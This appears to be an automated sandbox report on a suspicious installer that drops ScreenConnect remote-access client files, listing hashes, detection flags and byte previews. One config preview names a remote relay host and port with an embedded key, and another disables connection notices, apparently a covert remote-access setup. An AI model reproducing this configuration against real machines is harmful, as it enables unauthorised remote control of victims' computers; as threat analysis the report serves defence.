SSDEEP:	1536:9Ai+zmNzdj8bv8DtYQ4RE+TC34/ibdt7Xx56:9UzmNDYQbEQta
MD5:	C1F206B0C0058DC4CC7B9F3125F61E20
SHA1:	541A1564799DA24C48BE188888F306381EF23728
SHA-256:	94E711FD79FC81084FB222FF927893669DDBA9890C6622DD4981FB5766438A63
SHA-512:	6163A255DAF2DC9EC14391F31CA09A466B7B33662F2215B9941ADD59B46CD1177E9240D2B1C42E41EA0AC9AE2EFA03F6A2D3E80497D32F6E505B813ED66DA2AD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.8..........."...0................. ........@.. ....................... ............@.....................................O....... ............... )..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S...............................................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....(".....0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	598816
Entropy (8bit):	6.182826342545805
Encrypted:	false
SSDEEP:	6144:0ya9pDzjhf+YMojz3cZRzyyUs0Ny2rOfQyEAlVw72191BVi1NnfEQcYF2/R4IrNC:jajDzNZFjLcZRzyyh5/EA3wv1lSYGXk
MD5:	AB5FA8D90645878D587F386D0E276C02
SHA1:	A602A20735A1104851F293965F1FE4AB678BF627
SHA-256:	316BBF433F1F803D113ADF060C528CCC636656CEE26B90F5FEA011C1C73C7D16
SHA-512:	A181E23C8FA01BC1D9F0F9F95A5CA6112E2B61F34F4C1DA696D3CCABBBD942BCC81A3F4A60921328A6020D28AED8711C22BE33761CB685921D50FEA8B1D7B986
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]..........."...0.............".... ... ....@.. .......................`......0.....@.....................................O.... .................. )...@......$...8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......LC..X.............................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	true
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	842248
Entropy (8bit):	6.268561504485627
Encrypted:	false
SSDEEP:	12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
MD5:	BE74AB7A848A2450A06DE33D3026F59E
SHA1:	21568DCB44DF019F9FAF049D6676A829323C601E
SHA-256:	7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
SHA-512:	2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..\|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...\|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...\|..............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.861320173003981
Encrypted:	false
SSDEEP:	1536:QtyCl44uzbexI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7AB7gxv:78BxukLdEBY
MD5:	2C158A30F7274E1931860E434DE808A2
SHA1:	F649A56C9A598117D68CC6999627A937305DB6C7
SHA-256:	B623E67BEA356C1793F3C921C5838719ED8B879EFCD966E97EE753498B1618B5
SHA-512:	14BD481BF183CACAE210EB06AFF04870C6D53D3E7F095EA7F96A7EA227167E6A38EB20C9EDE9F36BF23D02C36182A463239B3A835D0BD28E8666C378F76FE64D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..@...........^... ...`....@.. .......................`...... .....@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	4.7228220006400745
Encrypted:	false
SSDEEP:	48:35iMs86h/dHH/dHS/dHmh/dHfh/dH8h/dHjdH6dH85AfdH55AfdHKdH/dHAdHYOk:0OeHVHeHyHzHAHZHUH82H52HkH1HyHDC
MD5:	095C85ACC658F0733BC6941163EC234C
SHA1:	298C53608E02CAC620702CB6ABE75C70560C03B1
SHA-256:	8E3DC9D06B282A536E1AF7806D7F434D5738D4932DAE557CCD762BFEED0BFC11
SHA-512:	FE3FBE2BCD2BAABCF192663DD7603CCE1DB1025A9D40AD98598D5441D892EFC0C94AA41FE61256762538E0ED3BCC3E7958CDBF87C2D577EE3BDD561597635D03
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings />.. <ScreenConnect.UserInterfaceSettings>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConne

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (447), with CRLF line terminators
Category:	dropped
Size (bytes):	937
Entropy (8bit):	5.785690574308825
Encrypted:	false
SSDEEP:	24:2dL9hK6E4dl/SKGumeV858KnTqKoIgmCeKMG3vH:chh7HHSomeV8LnuKoHmCeKT3v
MD5:	5E233AF4F36C85FA9CA6A643F8CEA130
SHA1:	9F64A3CFB01BBFE02C4511F0AF9856FA2DA89452
SHA-256:	317F6ACC9CF9A2DAD21874D0F439C6B6DE3C14BA875FAA525B24CA5DBC74C91D
SHA-512:	4CD32CD0243BEA0CA3C45544D65F4DBA0DBEDB79E09C4A8211AF0568E2F6C7EFE77B5D2C7EA21C7EB94FF1863D426EBA850055819F294DF1C1D0C4D311C036D7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=lokistorage.xyz&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	746
Entropy (8bit):	5.349174276064173
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
MD5:	ED994980CB1AABB953B2C8ECDC745E1F
SHA1:	9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
SHA-256:	D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
SHA-512:	61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmpzNIZ0YQ.exe.log

Process:	C:\Users\user\Desktop\tmpzNIZ0YQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.36509199858051
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
MD5:	1CF2352B684EF57925D98E766BA897F2
SHA1:	6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
SHA-256:	43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
SHA-512:	9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Category:	dropped
Size (bytes):	1110630
Entropy (8bit):	7.800118817272725
Encrypted:	false
SSDEEP:	24576:QUUGGVA5kuQ7Ye80NncfI59+5lwXoTl2cx:jGVyk7cer5IIvXobx
MD5:	845B0569D54305E62C6E8FFE198D217C
SHA1:	CD06C3D1554FE08099ADA4F4448A23A6422E6234
SHA-256:	4DA6C507C746CD07CA4546E723D0D145BBF4D26FF8DE13F1A0750EF323A89A2E
SHA-512:	AF45BB8199F2AF323B9954DA0D11EED51459708608D356BC40BD9D9189C02C2C902F533077724DD7C6A7068E564B5C8F621EF1032098CEF26ED26D5BF26E23FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..\|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\CustomAction.config

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	228
Entropy (8bit):	5.069688959232011
Encrypted:	false
SSDEEP:	6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
MD5:	EB99EE012EB63C162EEBC1DF3A15990B
SHA1:	D48FD3B3B942C754E3588D91920670C087FCE7E9
SHA-256:	C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
SHA-512:	455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.Cab.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.62694170304723
Encrypted:	false
SSDEEP:	768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
MD5:	77BE59B3DDEF06F08CAA53F0911608A5
SHA1:	A3B20667C714E88CC11E845975CD6A3D6410E700
SHA-256:	9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
SHA-512:	C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.340550904466943
Encrypted:	false
SSDEEP:	384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
MD5:	4717BCC62EB45D12FFBED3A35BA20E25
SHA1:	DA6324A2965C93B70FC9783A44F869A934A9CAF7
SHA-256:	E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
SHA-512:	BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.657268358041957
Encrypted:	false
SSDEEP:	768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
MD5:	A921A2B83B98F02D003D9139FA6BA3D8
SHA1:	33D67E11AD96F148FD1BFD4497B4A764D6365867
SHA-256:	548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
SHA-512:	E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	176128
Entropy (8bit):	5.775360792482692
Encrypted:	false
SSDEEP:	3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
MD5:	5EF88919012E4A3D8A1E2955DC8C8D81
SHA1:	C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
SHA-256:	3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
SHA-512:	4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!\|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Core.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546304
Entropy (8bit):	6.03286879586464
Encrypted:	false
SSDEEP:	6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
MD5:	3B1BA4BEBEFDC8A95B0F2F0B4E50C527
SHA1:	15551D2E8BFB829F3A96D161B43DE820C0D417CE
SHA-256:	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
SHA-512:	F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.InstallerActions.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.19884453207748
Encrypted:	false
SSDEEP:	384:SBHH+yElQjHVPioy4cDphaC/GeXczrMRbx1kjvdNU5yYoJ37dbr9DO:hrCtPcDCyXcMJ5yp7dbtO
MD5:	9260AFE4BBDE2549FC0B92F657C2E50A
SHA1:	5580778A62B06D7B56D3F788727514551DE31647
SHA-256:	588D3A5E1B91D3756F74EA61C9C1B5F7871AF924FAB469CEBB579F8AEB2FC135
SHA-512:	AFCE644EE04813E1E323B719E8AD3CFEFE6E20AD0AA821F1325B8E0AE0144A7CFF4E0F1F4B6F45DF33F060392F94BCFD88D62B2218FD0BC573D65A20D80E968B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zJ..........." ..0..N.........."m... ........... ....................................@..................................l..O................................... l..8............................................ ............... ..H............text...(M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................m......H........2...9...................k........................................(....^.(......./...%...}....:.(......}....:.(......}....:.(......}........0..h.......s#......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~......"...s....%......(...+%-.&+.(.......$...s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(......{....s .....-..o!.......{....r}..p.o

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Windows.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721344
Entropy (8bit):	6.638160977312247
Encrypted:	false
SSDEEP:	24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
MD5:	D196174CF03F86C8776E717F07D5D19F
SHA1:	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
SHA-256:	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
SHA-512:	CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..\|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...\|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformAppConfigXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5358
Entropy (8bit):	5.152842845836485
Encrypted:	false
